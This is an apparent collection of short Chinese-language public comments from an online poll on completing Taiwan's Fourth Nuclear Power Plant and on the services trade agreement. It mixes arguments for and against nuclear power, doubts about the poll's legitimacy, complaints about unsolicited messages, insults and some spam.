<br><br>如果核四爆了北區的人和資源可以撤退到中南部,順便平均分散過度集中在臺北的社會資源,也把災區回歸自然。如果現在停建,改天又發現不得不再找地方再建時。萬一核4.5建在台中,爆了,臺北房價、人口那麼高....「災民」也住不起
<br><br>如果替代能源真能有如眾政客們說的那?好!歐洲國家就不用因為歐債問題而停止補貼政策了!太陽能股也不會跌到差點倒!風力發電機也就不用被西門子綁架了!
<br><br>如果電價漲反核幫我付,我OK,但是要我為別人的主張付出長期一生的代價,別想。
<br><br>如果歐美等先進國家停用核電,我們才停用。否則經濟成本過高,台灣人要如何生存。
<br><br>如停建,到時電費物價起漲,企業受不了而撤出!那麼種種的問題會更多!
<br><br>如電價漲、供電不穩定、工資要漲工作時間要減少,未來年青人要賺22k都沒有機會
<br><br>安全性是最大的爭議點,支持核四燃料充填的人,未來如何去面對發生核安問題的後代子孫?用良心去面對未來世代的批判,現在才應該徹底停止核四,讓科學家?明日的能源努力,研究發展出更新的替代能源!
<br><br>安全的替代能源才是王道
<br><br>安全指數那麼低!還日本10幾年前的技術,看看日本311,有第二個臺灣嗎?毀了是要住哪?去大陸當乞丐嗎?
<br><br>安全保證是必要,這需以專業專家的評核?定為判定依據。就電力效率成本和綠色環保方面,目前核電遠優於其他發電方式。
<br><br>安全第一 ,發展主義適可而止
<br><br>安全無虞,應啟動
<br><br>安全無慮下管理使用,發揮用電分散風險
<br><br>安全管理才重要。居安思危,電廠經驗傳承很重要。都沒有狀況不代表不會發生,委外或派遣工是個大危機。福島可為戒鏡,東電委外之廠商可是大商家。
<br><br>安全與民生優先考處
<br><br>吃屎吧白癡統計要統計還要做假zz
<br><br>因為我只是想上大學
<br><br>因為都已經有三個了有差嗎?台灣這麼小??
<br><br>年限到關
<br><br>年輕人好手好腳要努力打拼,電費、生活各項費用漲上去時,不要怪東怪西,畢竟台灣人很猛,尤其現在的小孩(通指為大學生),要高薪不要工廠,要享受不要賣命!上街頭又不肯負責!沒有生活能力的人,沒有資格談社會時事,很想問最近很紅的那些人,錢從那裡來?一張嘴喊衝、罵人,就可以生活?那我們這些天天工作的人,努力守法,尋求平凡的人,算什麼?不是人?不是公民?騙人那麼多!叫那些社會上不要科系的老師、老學生,少在鬼吼鬼叫,不過是被媒體寵壞的一少數人罷了!有辦法自給自足,又能回饋給社會上需要的人,才是真正的臺灣公民!做不到?就不要喊什麼公民不服從!認耐很久了。
<br><br>年營收1400億。
<br><br>年營收300億。
<br><br>完全停止
<br><br>完全廢除核電
<br><br>完成才重要,為下一代主人準備,因下一代核去何從?
<br><br>完成統一,中國人要驕傲身為中國人
<br><br>希望大家不要只看眼前利益,眼光放遠一點,想想後代的未來好嗎?
<br><br>希望大眾更加明白反對核四不只是核安核廢的問題,更是背後政府財團集體營私的憂慮,任何國家重大工程都存在如此龐大的利益勾結。我反貪腐、反核四!
<br><br>希望用太陽能發電
<br><br>快去吃便當吧!
<br><br>我不反對核電,但核四興建過程我認為有問題,所以對其公安存疑。
<br><br>我不是太懂,但是聽說核四已花了人民三千多億興建,之前已?用的核電廠壽命也快不能用了? 替代能源發電,環保的風力水力太陽能發電等又不敷使用,且成本會比現在高出數倍,也是人民自己要負擔? 聽說台灣的核電廠的安全是全世界數一數二的安全? 我也希望全世界都沒有核電意外危害到人類的安全,大家都用環保的電力來源,電費又不加價,那就當然不要用核電? 但這畢竟還不是可以做到的事實? 沒辦法啊,現實世界就是有許多事情很無奈?
<br><br>我不想台灣有核災
<br><br>我不想看到第二個車諾比,更何況是發生在自己身上。
<br><br>我反核四
<br><br>我支持服貿及支持核四妥善運用,勿浪費多年公帑
<br><br>我支持服貿
<br><br>我支持建核四
<br><br>我支持核四真搞不懂不要核四,那請問現在在用電的這些名眾,你們的帶步工具、公司、家中用到任何用品,以及身上穿的那一樣不是用電生產的,如果只是單細胞去思考這樣的問體,請直接回到山林裡生活,請不要用屬於現今生活有用電生產出來的東西。感恩!也恭喜回到原始人的生活,因為這樣最健康。
<br><br>我支持核建
<br><br>我支持終止核能發電
<br><br>我支持繼續建立核四
<br><br>我支持
<br><br>我已經重複收到很多次簡訊了,你們的訴求也傳達過了,請勿再亂發簡訊騷擾。
<br><br>我也怕幅射外漏 但是其他能源 更是會排放二氧化碳 對環境也是直接的影響 沒有核四供應 電費上看一度電8塊 電費漲其他東西一定漲 且核四早從就有爭議為什麼感覺到有心人士在大選前搞事端
<br><br>我也是
<br><br>我本人也十分夠資格談電,但完全無法理解支持核電的論調.
<br><br>我亦是如此
<br><br>我只能說這些怕被取代的人
<br><br>我有兒女,我不希望把不好的東西留給我的兒女!如果核能真的安全,麻煩支持核能的人一人領一桶核廢料回家擺設!
<br><br>我希望自己的下一代過得安全 雖然我還年紀小 但我想先為自己的未來和下一代奮鬥!
<br><br>我沒說支持服貿.幹.不要亂傳!
<br><br>我怕他!停停走走!浪費納稅!
<br><br>我建議核四直接廢除,尋找替代的能源!
<br><br>我相信台灣不會一直哭窮喊經費不足
<br><br>我是文明人,我需要用更多的電更多的3C,我需要穩定、便宜、乾淨的電源
<br><br>我是牛我反芻!看!
<br><br>我是人,我反核!!
<br><br>我是人,我反核
<br><br>我是人我反核。
<br><br>我是人我反核
<br><br>我是人我反對核四
<br><br>我是人 我反核
<br><br>我是石門人,核一如續延役!那就遍台核電,以示公平。否則應該即刻全國廢除核電廠。永?後患。
<br><br>我是台東人,我反對核四
<br><br>我是散赤人沒能力反核
<br><br>我倒覺得現在馬政府的決定也算是聰明
<br><br>我們不要為美國核子設施浪費國家金錢,更危害下一代!
<br><br>我們只有一個地球,一定有其他替代能源,只看政府有心沒心,我們不該凡事便宜了事,然後把問題留給下一代。
<br><br>我們有多少時間等待替代能源
<br><br>我們和日本人做了28年的生意, 我知道:如果福島電廠會發生的事台灣「一定會發生」。台灣所處的地質條件和日本一樣啊!
<br><br>我們為什麼要蓋個炸彈來威脅我們的生命!
<br><br>我們感到痛恨及痛心!我們的前途怎麼會由那群人說了算?!
<br><br>我們靠地熱能讓大家都有電用嗎
<br><br>我們還有很美好的未來,我支持廢核四和廢掉所有核場
<br><br>我們還是需要核能供應我們日常所需的電,只是核四的建案有漏洞,很多地方都生鏽,只怕開始運作會出問題,我支持核能不支持核四
<br><br>我要永續的電
<br><br>我要生存,就要電力。
<br><br>我要用電,我支持核電。
<br><br>我要安全的政府及國家!
<br><br>我要無核家園
<br><br>我挺核,但不挺核四。
<br><br>我根本沒考慮我為什麼要念這個系
<br><br>我就是支持~~~
<br><br>我認為台灣若無比核能發電更好的方式,核四必須要建,但需全民去監督安全審查,而非一昧廢除核四
<br><br>我認為核四再蓋下去,台灣人隨時都要活在核災的陰影之下,日本活生生的例子還不夠給台灣人看嗎?而且台灣的國土也才多大啊?!3個核電場還不夠嗎?那些支持核四的人是收了多少錢啊!這些人也太自私了吧,為了那些錢,然後來害死台灣的2300萬人?真是令人很不屑!!
<br><br>我認為核四是我們沒辨法的選擇手段,如果是大地震~震破核心。那麼台灣所有的房子都再見了。台灣本身沒有什麼能源,!請不要政治吵作!要牛肥又不給予吃可惡那些人的嘴臉!
<br><br>我認為停止核四並將目前的建築改成核電博物館,以及核電發生狀態的預演地,還可外借國外專業人員預演,並讓國人可以去參觀,瞭解核電!
<br><br>我認為停止核四建設對環境是好,但我不希望這個議題又引來不理性的抗議和群眾,這樣台灣並不會更好,只會更亂!
<br><br>我頭給你
<br><br>我還能認為這核四廠是有絕對安全的嗎?
<br><br>我贊成有條件的興建核四
<br><br>我贊成廢核
<br><br>我覺得也可以用來分攤核1,2,3的核廢料
<br><br>我覺得很多隻看聯合報,中國時報大標題的泛藍群眾,都認為反核人士是被操弄,不暸解狀況,起碼,我所認識的外省朋友都這樣告誡我
<br><br>我覺得對未來是好的!因?有了核四才有經濟!
<br><br>我覺得蘋果日報,操弄煽動學運,動機不明
<br><br>技術專業問題豈是口水台灣電力方便之餘,請想想一群基層工作人員的辛苦。
<br><br>把核一、二廠提前結束
<br><br>把核四較新較安全來完成使用後,再慢慢把舊的核一核二??淘汰。
<br><br>把核廢料放你家旁邊,你就知道了;核心一旦熔毀,馬統還可遠走,我們呢,無處可躲了
<br><br>把核廢料處理好再建新的巴
<br><br>把核4蓋好將來好核1,2除役,若無核能,臺灣產業沒有競爭力,請勿留給下一代一個經濟蕭條的社會!
<br><br>把問題掩蓋在檯面下蒙混
<br><br>把廢核人仕都記錄起來!限電時停他家的電!有本事就別用電!
<br><br>把興建核四的費用拿來徹底開發並且使用替代能源發電,對台灣的未來更有安全保障!
<br><br>找死
<br><br>找到替代能源再來停核四
<br><br>投票了能怎樣嗎?
<br><br>投資1260億。
<br><br>投資250億。
<br><br>改成其他安全的發電方式
<br><br>改變成一個能與其他國際車廠一爭高下的汽車品牌
<br><br>更有趣的是!
<br><br>更何況,贊同核電的理由,若非直接涉利,也是各人用電的方便考慮
<br><br>李前總統的擔憂,不是沒道理,因為光是八大行庫住宅貸款餘額,截至3月底就高達5兆6788億元,房價掉3成,銀行呆帳抵押變多,只能倒閉收場,過去就有案例。
<br><br>作假的投票 可恥
<br><br>你不要再傳簡訊給我了
<br><br>你支持建核為了眼前經濟發展,但莫視台灣人民生命遭遇核災的可能,沒命了還賺什麼錢?短利是人類毀掉地球也自食惡果帶來滅亡的根本。服貿更是中共滲透併吞台灣的手段,支持核四及服貿者就是共犯。
<br><br>你去問一點臺北人,他們會支持
<br><br>你的工作就是容易被取代的
<br><br>你知道這樣發簡訊很像在詐騙嗎?
<br><br>你怎麼有我電話?
<br><br>你是什麼東西
<br><br>你是好野人你反核
<br><br>你是誰拉
<br><br>你們的名調有準嗎?不敢恭維
<br><br>你們的問題太簡化了
<br><br>你們為什麼會有個人隱私的手機號碼?
<br><br>你們是什麼單位啊?這樣投票有可信度嗎?
<br><br>你們都是騙人的吧民調有百分之75反對核四
<br><br>你們
<br><br>你這豬玀,設計程式自動點成支持通過服貿協議,偽造投票民意,卑劣小人!!!!!!
<br><br>你媽知道你在這裡丟臉嗎?
<br><br>你會發現這些反對團體都一樣,
<br><br>你
<br><br>別只重眼前利益,也別把傷害丟給未來的小孩,更別再用沒核能會缺電或漲價來危言聳聽!
<br><br>別有天發生311我們連跑?
<br><br>別再來這一套
<br><br>別再建了
<br><br>別在害一般人民跟我們後一代了!
<br><br>別造假新聞
<br><br>別亂了
<br><br>別鬧了好嗎 簡訊送出誰敢點啊
<br><br>別鬧了
<br><br>別讓我們的競爭力剩下一張嘴巴!要深耕基礎建設。
<br><br>別讓美麗的寶島變成核島!
<br><br>別讓政客以漲價來威脅,要求替代能源
<br><br>走手工精品
<br><br>那我支持
<br><br>那東西就算蓋好也不能用
<br><br>那核廢料不怕沒地方放了,放在支持的人家裡好了!
<br><br>那許多人的生活都會毀在那些想要台灣有競爭力而不顧他們死活的政府官員上
<br><br>事事皆有險
<br><br>事緩則圓
<br><br>享受用電的方便當然得承擔一部份必要的風險,大家當知政黨惡鬥對國家的傷害遠遠大於核能災害,只怕核災還沒發生,國家早已被一些政客玩毀滅了;
<br><br>使用電的人都沒資格廢核四,除非有可完全替代核能的能源又環保再談廢核四吧!!
<br><br>來政治炒作。請拿出較建設性的主軸,
<br><br>來潮聖~~
<br><br>兩個小時前的圓餅圖與現在這張變動很大,懷疑調查的可信度嗎?
<br><br>其一 沒有更好的替代能源出現前,核電必須存在!
<br><br>其二 讓核四商轉總比老舊核電延役來的安全
<br><br>其實只要全國的照明都改LED和無極燈,就可以不必用核四,且可以多省很多的CO2
<br><br>其實縱觀現今亂像,那群盲目無知無遠見無法傾聽不同意見,自以為且自稱是代表人民的一小群小丑,有何資格狂言亂語?!
<br><br>呵呵目前的癈核料都沒辦法解決了,還要再增加新的這是什麼想法?
<br><br>呵呵
<br><br>每天鬧下去,早晚有一天會亡國!請大家好好努力工作,拼生活!
<br><br>每次收到都是不同的帳號,發這種匿名訊息叫人來投票,連自己的名字跟帳號都不敢透露,你確定你辦的結果會具公信力嗎?
<br><br>每年交通事故死亡的人數那麼多,是否把所有機車、汽車、卡車、遊覽車、拖車等交通工具全部禁止使用。
<br><br>每逢選舉,政府頻頻祭出打房措施,要吸引無殼蝸牛選票,但最後的結果是,沉默的有產階級受害,資金外移,銀行受累,全民皆輸。(民視新聞 於 凡 葉晏昇 臺北報導)
<br><br>沒了台灣要靠什麼?
<br><br>沒工作!
<br><br>沒有人不先做電力管理而拚命蓋電廠
<br><br>沒有代替能源。
<br><br>沒有安全核安
<br><br>沒有完整的能源政策,只有為反對而反對,有核能也是下一代在享受,沒有核能也是下一代要承受!民進黨有解決方案嗎?反正民代選出來不算數!
<br><br>沒有邦交的小國,又沒有自己能源,如果再生能源能夠有效供應的話,日本、大陸早就廢核,日本何以重?核能,大陸持續要蓋數十座核能廠,其道理很清楚,所以台灣需要核能,也只有靠核能??才能延續下去,造福下一代的子孫,只是政府應該徹底解決核廢料問題,才能消除疑慮
<br><br>沒有明確的配套及因應措施,一昧的反對只顯示出無知與不文明的暴力
<br><br>沒有長期的能源政策,受害的將是社會大眾!
<br><br>沒有核四,台灣就沒有未來
<br><br>沒有核四!電費一定上漲不說!有可能以後還面臨斷電的危機!
<br><br>沒有核四台灣怎麼走下去、怎麼讓台灣人民活下去,沒有開發新的替代方案就不能沒有核四,政黨的亂象才是目前必需先解決的大事,讓做事的政黨把國家帶入一個安定而且可以讓人民安居樂業的生活才是當務之急。
<br><br>沒有核四那來的電力,聰明人想想便知,何需解釋。
<br><br>沒有核四那接下來的核電廠都將會除役,那請問少了核能發電所供應的電力要從哪裡來?是不是要更加依賴火力以及其他的發電方式?那也就表示要多蓋更多的發電廠?那到了那個時候,台灣的人民是不是又要走上街頭抗議發電廠不要蓋在附近?那又會是一大問題
<br><br>沒有核四電從哪裡來?不准漲價!不准限電!不准停電!又不要核四,請問你們?電在哪裡?
<br><br>沒有核電,才有下一代,加油!
<br><br>沒有核電以後如何生活
<br><br>沒有高污染的核電,台灣也不缺電。
<br><br>沒有配套措施停建核四以後電力不足怎麼辦?核四加強安檢邀請中外專業人士組織常設獨立機構駐廠安檢穩定人心,未來用電只會成長不會減少,核四可以公投不可以讓少數人操作多數人的意見一定要用合格選民過半數或?對多數才可以代表民意,否則上街頭就代表民意會鬧的就代表民意,那以後就不要選舉了。街頭抗爭每天都在鬧政府要拿出鐵腕來執行公權力否則善良老百姓如何生存?希望政府社團黨派不要各為己謀,目前台灣已到危急關頭要再沉淪變成台勞台傭最後被人「台係」!
<br><br>沒有替代能源以前不要?言廢核,除非寧願被國際淘汰。
<br><br>沒有意見,只覺得建對大家都有好處
<br><br>沒有意見
<br><br>沒有意義的投票 反對繼續興建核四 反對國民黨貪汙賣台
<br><br>沒有電外資是不會來的。
<br><br>沒有需求,停止供給才有意義
<br><br>沒有
<br><br>沒命了還能有什麼要求
<br><br>沒核四~電從哪裡來
<br><br>沒核四、就沒經濟!
<br><br>沒核四、電費會大漲!
<br><br>沒核四不會死
<br><br>沒核四大家都去吃屎吧
<br><br>沒核電?民生物價統統漲?人民生計怎麼辨?工廠怎麼辨?成本增加怎麼生存及競爭呢?又沒有替代能源?只會?食抗議有個屁用
<br><br>沒電怎可以
<br><br>沒錢繳電費
<br><br>沒
<br><br>忠孝不能二全 嘆
<br><br>念了個大學出來根本就沒做相關產業
<br><br>或許核電是最快最有利的資源,但它也是消耗我們最快的
<br><br>所以我支持燃料填充
<br><br>拉到核安最高段,穩建減核,強力發展綠能及黑潮發電、併行能源政策、同時也可輸出國際。
<br><br>拒絕古根漢,古根漢去了西班牙,
<br><br>拒絕杜邦,杜邦去了山東,
<br><br>拒絕拜耳,拜耳去了德州,
<br><br>拒絕拼裝核場
<br><br>拒絕拼裝核4
<br><br>拒絕迪士尼,迪士尼去了香港,
<br><br>拒絕F1賽車場,F1去了新加坡,
<br><br>拒當第二個福島
<br><br>拔辣
<br><br>明顯為反對而反對。馬總統不應去探視,助長此歪風。
<br><br>妳要怎麼說服人妳們的宣傳投票的真實性?
<br><br>命只有一條~沒有"萬一"...ok
<br><br>命重要還是金錢重要。
<br><br>垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼垃圾廣告發免錢的很爽吼
<br><br>垃圾廣告發免錢的很爽吼
<br><br>官逼民反!
<br><br>尚未提出有效方案?決電力問題朝藍綠兩黨更要合作為臺灣百姓未來而努力,我們不分藍綠,而是看誰能夠?百姓安定的生活,謝謝,
<br><br>尚無建議
<br><br>居住安全優先,住宅不安全不安心,有便宜電費不值得,鄰近日本。電視轉播放影片值得參考。國營台電公司要求開放民營化公開化。
<br><br>物價就不漲嗎
<br><br>物價齊漲是折磨 核災發生是痛快 更何況 核災發生機率小......你我等著瞧.....等物價齊漲時 又會哇哇叫的 還是那些.....自私的畜生..........
<br><br>玩不起
<br><br>盲目足?、不知
<br><br>盲目的反核,替代方案也沒,漲電費要罵,又想便宜用電,非常有事的台灣人
<br><br>盲目跟隨澈底停建核四的人,不知民生之苦!任由政客帶著走!扣除政治利益外,尚有一群所謂反核人士、他們家大業大跟本不需煩惱未來及子孫生活、而一般小老百姓為了生活、加上市場委縮許多人跟?無力爭取或反對、只能腰帶再束緊些;因為我們都是小小百姓,只希望好好努力有口飯吃、不要再受政治、財團影響什麼都漲。核四有必要存在、數千億己投資、希望核安確實做好、人民、後代子孫才能繼續在寶島上生活。如果癈核四、我也同意!首要是投資金額及其所有支出能全數歸還政府、再轉發展替代能源。
<br><br>直接上街頭
<br><br>直接停建核四
<br><br>知道嗎!!台電一個做核電廠失水災害模擬委外計畫的碩士畢業生所領的計畫薪資,比一個台灣大學正教授的月薪還要高.........納稅人的錢是被台電這樣花的!
<br><br>社會上根本沒有核四燃料填充這個議題。有誤導大眾的意味。這樣設計不好。請改善~
<br><br>花幾千億的人民血汗錢不運轉交代的過去嗎?
<br><br>長痛不如短痛!廢除核電!不要再姑息養奸!核廢料的半衰期是三十萬年!臺灣承擔不起!勇敢的做個睿智的決定:廢核!為自己!為後代!也為臺灣的未來!
<br><br>阿薩德發順豐
<br><br>服貿應要在做好配套後再協商討論,且它的協商本身就充滿爭議。另請問拰的問卷調查抽樣是否具有代表性?如果使用偏頗的言論進行調查,可能只會吸引同意該言論的族群投票,請在設計問題時思考此事。
<br><br>東拼西湊核四安全性已經讓人堪憂,尤其在這個人口密集的國家。
<br><br>果然, 想停建的佔大多數?T"T
<br><br>枝
<br><br>哈哈好
<br><br>封存不是一種暫時性的措施,而是一種不負責任的決定。想想你家的車子封存兩年會怎樣;尤其是電子電機產品。
<br><br>建了這麼久,從成本、環保來講,都該商轉,難道燒煤、燒油來發電就能永續經營?還是把核1-3都停掉,我們一度電漲到所有人幹瞧的程度?醒醒吧!
<br><br>建了 薪水會變高嗎
<br><br>建好之後把這個燙手山芋丟給下一任總統
<br><br>建好但封存,未來公投決定是否開啟。
<br><br>建核四,廢核一、二、三。
<br><br>建核四非必要執行 應尋求其他方法
<br><br>建核四是科技退步的行為
<br><br>建核四廢核一
<br><br>建設無核家園,保佑台灣
<br><br>建設發展、經濟成長,所不可或缺的能源 還得依賴核四
<br><br>建構完成,廢不廢,以後再視狀況而定
<br><br>建議去看看嚴凱泰如何把裕隆汽車
<br><br>建議落實節能減碳與再生能源或環保能源的推動發展
<br><br>很多先進國家都有核能!我們不跟進,像越南、菲國一樣嗎、很多先進國,發展到一定成度,才會想停建、我們有歐美一樣進步再來說吧?
<br><br>後代子孫.永遠在台灣生存.核四必全部停建.
<br><br>怎麼可能支持填充的人多 這些是白癡嗎
<br><br>怎麼可能有人支持建核四,你們拿的到回扣嘛?
<br><br>按台灣現況,其他替代能源均為空談. 不是技術不成熟,或是成本過高. 而傳統能源,火力成本與日俱增,且?生大量空?,而水力發電,本島水源本即不足,且談及興建水庫,則必有某民間”賤”黨,聚眾抗爭滋事,爭取補助
<br><br>拼裝車
<br><br>非安全,核四掰掰!
<br><br>非核家園才能永續 後代子孫有保障
<br><br>非核家園是個夢想,要實現非常困難,政府在執著續建核電前為何不讓大家知道他是安全的
<br><br>非核家園
<br><br>前提是要能確保核四廠是安全的,才同意燃料充填
<br><br>前提要大家都明暸,有可能直接面臨的經濟問題,和替代能源的局限性,和可能的污染等各方面訊息,平衡的推斷,任何以偏蓋全的言論和誤導,都不公正
<br><br>咳~
<br><br>哇
<br><br>為什麼反核四而不是反核能
<br><br>為什麼服貿~不用此方法讓民眾選擇呢?遺憾
<br><br>為什麼要支持什麼核四燃料填充啊?
<br><br>為什麼連他們也需要核電
<br><br>為了反對而反對!國家不進步!
<br><br>為了少數人的意見可以充分表達,請王院長開密室協商
<br><br>為了大陸沿海核電,請林義雄到中國?食
<br><br>為了下一代,一定要停止核電建設
<br><br>為了下一代子孫,
<br><br>為了下一代幸福
<br><br>為了下一代請停建核四!
<br><br>為了下一代
<br><br>為了未來每個明天,停建並廢除核電
<br><br>為了未來著想,支持就?了啦!
<br><br>為了永生,環境保護是必要的,以自身最微薄的力量一點一滴改進,節約能源,珍惜手工代替能源的部分,譬如手抄筆記本,聯絡事項等
<br><br>為了全民生命及健康著想
<br><br>為了全台彎以後的子孫?堅決反對o
<br><br>為了可以向下一代子孫交待,請求徹底停止核四建設.否則子孫代我們這一代受苦。
<br><br>為了台灣生濟發展,必須支持核四燃料填充。
<br><br>為了安全寧可重作一個新的原廠設計。
<br><br>為了每人的生活環境及下一代。
<br><br>為了孩子也為這片美麗的土地,別建了吧!
<br><br>為了後代子孫,徹底廢核
<br><br>為了臺灣的未來 為了後代子孫!
<br><br>為台灣加油
<br><br>為台灣長遠計,為萬世子孫著想,政府為百姓做的是長遠生計,在野有理由打?執政的,但只是反對沒有提出具體配套,是不負責任的,只是想奪取政權罷了,台灣正陷入這樣的泥拗中。
<br><br>為台灣經濟著想
<br><br>為何不想想那種行為才是真正要被抗議的
<br><br>為何不像德國看齊?只會和財團掛勾,和利益看齊,台灣就是下一個福島。
<br><br>為何一定要核能?
<br><br>為何沒有「建完封存不啟用」這項選項
<br><br>為何建好不運轉,問題真像告死老百姓,不要講電不夠用,欺騙人家,是騙自己,拿了人家多少而不能停建,
<br><br>為何要燃料填充?
<br><br>為我們下一代擁有安全的環境努力是我們的責任及義務,所以我主張廢核,請政府盡快開拓其他替代能源才是全民之福。
<br><br>為後代子孫
<br><br>為害居民生命
<br><br>為臺灣為了下一代
<br><br>為臺灣為了下一帶
<br><br>珍惜我們生命之源,美麗的寶島。
<br><br>省能源,能源省。
<br><br>相信,這些反核信徒所,節省下來之電力即足以滿足國人用電需求。
<br><br>相信科技,要享受現代化就必須承擔風險。
<br><br>相關民生必備
<br><br>看見台灣誏我們保存台灣
<br><br>看看日本、311後停止核能運轉後連續幾年外?存底是赤字。
<br><br>看看美國、英國等其他先進國家
<br><br>看看瑞士
<br><br>科技是可以加上安全參數的,政客永遠站在有利益且放大有利於它的一邊..
<br><br>政府。是大家長!要以公為大。犧牲小我,完全大我。這才是真正的「 民主 」
<br><br>政府並未真正投入風力,火力,太陽能發電,就直接否定認為成本很高,但是若是將核廢料處理成本計算,核能成本會更高。總之政府是想用民眾的生命來換取便宜的電價
<br><br>政府沒說實話!
<br><br>政府的執政能力與台電信用度,沒有信心
<br><br>政府要激急辦家家戶戶有太陽能
<br><br>政府能帶領台灣往這種方向走嗎
<br><br>政府眼中只有錢
<br><br>政府需要嚴格為人民把?,使用安全的整體配套並預先找出萬一出狀況時可以防?人民性命的決策。
<br><br>政府廢除核四
<br><br>政府應該,把建核四的經費拿來給全民蓋太陽能,若說?戶戶全額補貼也早已足夠了?
<br><br>政治鬥爭別再下去
<br><br>政客的嘴臉令人感到失望及噁心,不管藍綠皆同!
<br><br>政黨交替國家目標就改變
<br><br>政黨政治迂腐無能,還權於民實為上策!
<br><br>既沒辦法處理廢料更無法處理周邊事務,怎能消費下一代生活品質與空間,當代的自私與無知,竟禍延子孫萬萬年,於心何忍?決策者深思吧!
<br><br>既然不用就應完全廢止 避免國民黨有可能把核四當ATM無限存提!!
<br><br>既然核四是如此耗時耗錢的殘缺工程停建吧,別在自欺欺人了
<br><br>既然無法處理核廢料的問題,就不應該使用核能。沒有核電也不會沒有電!
<br><br>昭成建設公司在大同區鄭州路87號13樓違法使用請舉辦
<br><br>是不會有任何做為的
<br><br>是否有第三選項,例如建完再重新評估安全及用法的考慮.
<br><br>是否撒的發asf啊是輔導費阿薩德飛愛上
<br><br>洗洗睡
<br><br>降低環境污染源,發電效率高
<br><br>值得思考
<br><br>個人淺見
<br><br>胡?八道~我何時支持服貿了~不要亂灌票~國民黨惡質~
<br><br>要不然當時決定要蓋的理由,難道消失了嗎?
<br><br>要不然電費還要在長。
<br><br>要反核可以但有想到更好的方法嗎!
<br><br>要反壟斷,又想壟斷媒體。
<br><br>要司法公正又拜託法外開恩 。
<br><br>要台獨建國,又不要當兵。
<br><br>要地區發展,又不要國光石化。
<br><br>要便宜用電,又不要核能。
<br><br>要核四但不能沒有核安
<br><br>要停止須有替代方案,不要為政客所利用
<br><br>要停建核四,要無核家園,核能沒前途,鈾只剩20幾年可用,更何況那麼多核癈料往那裡放,不要再浪費無謂的資源了。
<br><br>要停建核四!代替方案在那裡!否則電費漲價!人民也要負擔得起!
<br><br>要停建核四!要有代替方案!否則就續建!
<br><br>要停建核四
<br><br>要停建就要想好對策,不要因反而反!
<br><br>要做民調也不說是哪個單位的
<br><br>要欺負員警,又叫員警保護。
<br><br>要買得起房,又不要都市更新。
<br><br>要經濟發展,又不要服貿協議。
<br><br>要經濟
<br><br>要徹底停止核四建設的人,請每人拿一千萬出來補貼全民的電費吧!
<br><br>要廢要蓋快覺定,拖那麼久的核能廠會安全嗎?
<br><br>要廢除核四,替代方案要先想好,廢除一個核電要?數個火力發電廠,更破壞地球大氣層,引發氣候大異常,後果更不敢想。歐美先進國家都比我們想的更透徹,也不會像我們如此魯莽說廢就廢,不應該受政治因素影響整個國家的發展,我很憂心國家的愚民過剩。
<br><br>要廢除核四建設,所有的核電廠要馬上停止運轉及時廢核
<br><br>要繁榮、要安定、要環保,要核四也要安全。
<br><br>若核四無法運行建設,請反核人士找出替代能源
<br><br>若都未曾動工,未曾投入各項工程,要廢要停悉聽尊便。國家建設必須傳承,如果半途而廢,如此輕鬆,那麼每朝每代,都來抗爭,國家豈有安寧之日。
<br><br>拿什麼叫人信服?拿什麼讓人幸福?
<br><br>時下可取代的能源根本也不足以供應核四的產能
<br><br>時代不同、真的需要,不可能回到過去,!
<br><br>時代巨輪前進至此更要不斷往前,凡先進文明科技都要承擔風險.
<br><br>核一,二,三廠不是已經卅年了,反核已經變成政治對立的爭議而已!
<br><br>核一二即將停機若無核四取代台灣將面臨缺電危機
<br><br>核一二廠皆己老舊,決不能再延役。核四可商轉有經濟上必要性。但核四?拼裝延宕,安全勘慮!人命關天如無十足把握運轉安全?建議全面廢核。
<br><br>核一核二總要除役,何種能源能便宜取代,天然氣是靠別人,其它的靠什麼?
<br><br>核四不啟用,核一核二老廠繼續運作那才危險!
<br><br>核四不蓋會浪費太多錢
<br><br>核四不蓋電費漲啊!
<br><br>核四不蓋 核一核二爆炸 有差嗎?應該建核四 停核一核二 進而建核五 廢核四
<br><br>核四不應該停建,應該暫時封存,也許現在核廢料無法處理或可能發生核災,但如果未來哪一天科技到了,利用其他可以代替鈾的元素且不會產生核廢料時候,再重起核電廠,這樣才不會浪費人民的公帑,政府現今應考慮其他替代能源,以供應用電
<br><br>核四內部工程師已發聲明:核四不像核一核二核三廠有經過嚴格審查!內部紕漏大,千萬不能蓋啊!
<br><br>核四太危險了,完全沒保障,停建吧,台灣主要的電力來源也不是核能。
<br><br>核四一定要廢
<br><br>核四又是拼裝的,怎麼會安全?
<br><br>核四工程價值四千億 如發生意外事故 四千億買也不回一個台灣 換不回你我的生命 你我的生命是無價
<br><br>核四已建許久現今再來找議題有這必要嗎!台灣不能再虛耗時光。
<br><br>核四已經完成99%,花了3000億,現在才棄置,應該續建,核一、核二?核三依原定時間除役或提早除役才對!
<br><br>核四已經投入大筆人力物力財力,就剩下最後運轉,沒有道理要停,如果停建,那麼歷任參輿決策者都需要彈劾,懲處,核四運轉的道理如同一個家庭買新車一樣,將舊車淘汰,新車相對安全,再說訂車款已經付了九成,如果取消還需支付違約金,血本無歸。還不能汰舊換新。
<br><br>核四本來就應徹底停建
<br><br>核四可以運行 不過前提是要國外專業的安檢過了才運行 核四太不安全 只是政客洗錢的工具罷了
<br><br>核四只是某些特定人士不需存款的提款機
<br><br>核四只是能源的一小成份,只支持廢核、天然氣發電,卻不省電、不願漲價,是無解的能源政策!再生能源不穩定,最終還需火力作備用電力,老百姓全面知識不足被帶著走。
